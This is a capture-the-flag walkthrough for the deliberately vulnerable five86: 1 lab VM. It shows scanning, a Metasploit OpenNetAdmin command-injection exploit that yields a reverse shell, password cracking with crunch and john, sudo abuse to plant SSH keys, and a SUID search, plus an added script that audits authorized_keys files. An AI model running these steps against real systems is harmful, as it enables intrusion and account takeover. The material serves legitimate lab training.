five86: 1 Walkthrough Vulnhub CTF
Today we are solving five86: 1, created by DCAUC. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Download here five86: 1
Our first step is to identify the target IP address; we start with netdiscover.
Next we run an aggressive Nmap scan of all ports and services. We see that the target machine is running SSH on port 22, HTTP on port 80, and Webmin (httpd) on port 10000.
nmap -A 192.168.1.7
Enumerating the HTTP service on port 80, we open the IP address in the web browser.
We see the /ona directory, which looks like OpenNetAdmin is running. Going to the about page, we see the OpenNetAdmin version.
We go to exploit-db and search for OpenNetAdmin v18.1.1; I found a command injection exploit and downloaded it to our local system.
Adding the exploit to msfconsole: copy the exploit from our Downloads directory to the Metasploit modules directory.
cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
set rhosts 192.168.1.7
set lhost 192.168.1.4
Session 1 is open and we have a reverse connection from the target machine.
The shell it gave was not a proper one, so to fix that we run the Python one-liner. As this machine was loaded with Python 3, we need the Python 3 variant of the one-liner to get a proper shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Run ls -lsa to check all hidden files and directories; I open the .htpasswd file.
Creating a wordlist with crunch: length 10, using the target password's character set.
crunch 10 10 aefhrt > word.txt
Try to crack the hash file with john using our custom wordlist.
john --wordlist=word.txt hash
Our hash is cracked. Now we change our shell from www-data to the user douglas and successfully log in with the douglas account.
Run sudo -l to check for commands that can be run with sudo. It looks like dpkg can be run as sudo.
Generating an SSH key for our second user:
ssh-keygen -b 2048
I copy this public key to the target machine's /tmp directory and rename it authorized_keys.
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
After creating the key, we change the permissions on this file and copy it to our second user jen's /home/jen/.ssh directory.
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
Try the SSH connection without a password, and we successfully log in as the user jen.
After trying many directories during enumeration, I found a mail message.
Changing user from jen to moss with the password found in the mail message.
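From the defender's side, the key-planting step above leaves a visible trace: a world-writable authorized_keys file, or one whose owner does not match the home directory's owner. The following audit script is an added example (not part of the original walkthrough) that flags both conditions; it runs against a constructed temporary tree rather than a real /home, and the user names and key material in it are made up.

```python
"""Audit <root>/<user>/.ssh/authorized_keys for writable or foreign-owned files."""
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List


def audit_authorized_keys(home_root: Path) -> Dict[str, List[str]]:
    """Return {user: [findings]} for every home dir under home_root."""
    findings: Dict[str, List[str]] = {}
    for home in sorted(p for p in home_root.iterdir() if p.is_dir()):
        key_file = home / ".ssh" / "authorized_keys"
        if not key_file.exists():
            continue
        home_uid = home.stat().st_uid
        issues: List[str] = []
        # Check both the .ssh directory and the key file itself.
        for path in (key_file.parent, key_file):
            st = path.stat()
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                issues.append(f"{path.name} is group/world-writable "
                              f"(mode {oct(st.st_mode & 0o777)})")
            if st.st_uid != home_uid:
                issues.append(f"{path.name} owned by uid {st.st_uid}, "
                              f"home owned by uid {home_uid}")
        if issues:
            findings[home.name] = issues
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed sample: 'douglas' is clean, 'jen' has a 0777 key file."""
    for user, file_mode in (("douglas", 0o600), ("jen", 0o777)):
        ssh_dir = root / user / ".ssh"
        ssh_dir.mkdir(parents=True)
        key_file = ssh_dir / "authorized_keys"
        key_file.write_text("ssh-rsa AAAAB3NzaC1yc2E...constructed... user@host\n")
        key_file.chmod(file_mode)
        ssh_dir.chmod(0o700)


def demo() -> Dict[str, List[str]]:
    """Build the sample tree in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp(prefix="sshaudit-"))
    build_sample_tree(root)
    return audit_authorized_keys(root)


if __name__ == "__main__":
    for user, issues in demo().items():
        print(user, *issues, sep="\n  ")
```

Run it as root against the real /home by calling audit_authorized_keys(Path("/home")); the owner check only becomes meaningful there, since the temporary sample tree is created by a single user.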
find /home -type f -perm -u=s 2>/dev/null